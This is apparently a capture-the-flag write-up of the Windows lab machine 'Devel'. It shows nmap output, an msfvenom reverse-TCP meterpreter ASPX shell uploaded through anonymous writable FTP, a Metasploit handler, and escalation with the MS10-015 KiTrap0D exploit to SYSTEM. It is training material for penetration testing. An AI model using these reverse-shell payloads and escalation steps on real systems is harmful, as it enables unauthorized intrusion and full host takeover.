Devel

OS: Windows, Difficulty: Easy, IP: 10.10.10.5

Initial Enumeration

# Nmap 7.70 scan initiated Sat Jul  6 15:29:35 2019 as: nmap -p 21,80 -sV -sC -O -A -oN O-Detailed 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.24s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   237.33 ms 10.10.14.1
2   237.55 ms 10.10.10.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul  6 15:29:54 2019 -- 1 IP address (1 host up) scanned in 19.17 seconds

We have anonymous FTP and a web server. The FTP listing contains iisstart.htm, welcome.png and the aspnet_client directory, which are exactly the files IIS 7.5 ships in its default wwwroot, so the anonymous FTP root is the document root of the web server. Because anonymous users can also write there, we can upload a reverse ASPX shell over FTP (with the ftp client's put command) and then execute it by requesting http://10.10.10.5/shell.aspx in a browser; IIS compiles and runs the page under the application pool identity, which gives us our first shell.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=9999 -f aspx > shell.aspx
msf5> use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 10.10.14.7
msf5 exploit(multi/handler) > set LPORT 9999
msf5 exploit(multi/handler) > exploit -j -z

[*] Started reverse TCP handler on 10.10.14.7:9999
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.7:9999 -> 10.10.10.5:49157) at 2019-07-06 16:10:19 +0530

The IIS shell is unprivileged, so we run the local exploit suggester against the Meterpreter session and use the exploit/windows/local/ms10_015_kitrap0d module it reports. KiTrap0D (MS10-015) is a 2010 kernel privilege escalation for 32-bit Windows, a sensible candidate on a box whose banner later turns out to be build 6.1.7600 (Windows 7 / Server 2008 R2 RTM, no service pack).

meterpreter > run post/multi/recon/local_exploit_suggester SHOWDESCRIPTION=true
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated
msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)                                                     
   LHOST     10.10.14.7       yes       The listen address (an interface may be specified)                                                            
   LPORT     4444             yes       The listen port

PLEASE NOTE

Before running exploit/windows/local/ms10_015_kitrap0d, check the payload's LHOST and LPORT with show options. The local exploit module does not copy the settings of the multi/handler that caught the first session: LPORT falls back to the default 4444 and LHOST is filled from a local interface that may not be your VPN address. Set LHOST to your tun0 address (10.10.14.7 here) and an LPORT that is not already bound by another handler, otherwise the exploit reports success but the privileged payload never connects back.

msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit

[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Launching notepad to host the exploit...
[+] Process 2548 launched.
[*] Reflectively injecting the exploit DLL into 2548...
[*] Injecting exploit into 2548 ...
[*] Exploit injected. Injecting payload into 2548...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 6 opened (10.10.14.7:4444 -> 10.10.10.5:49158) at 2019-07-06 16:10:54 +0530

meterpreter > shell
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\system

User Own

C:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd***

Root Own

C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e621a***

Learning Outcome

I was not aware of how to use Metasploit sessions, or that we can even use the local exploit suggester if we do not find any vulnerable information and the box is a little old. Additionally, sometimes the exploit may be running fine but the LHOST and LPORT settings may be the problem. These were some key lessons while solving this box.
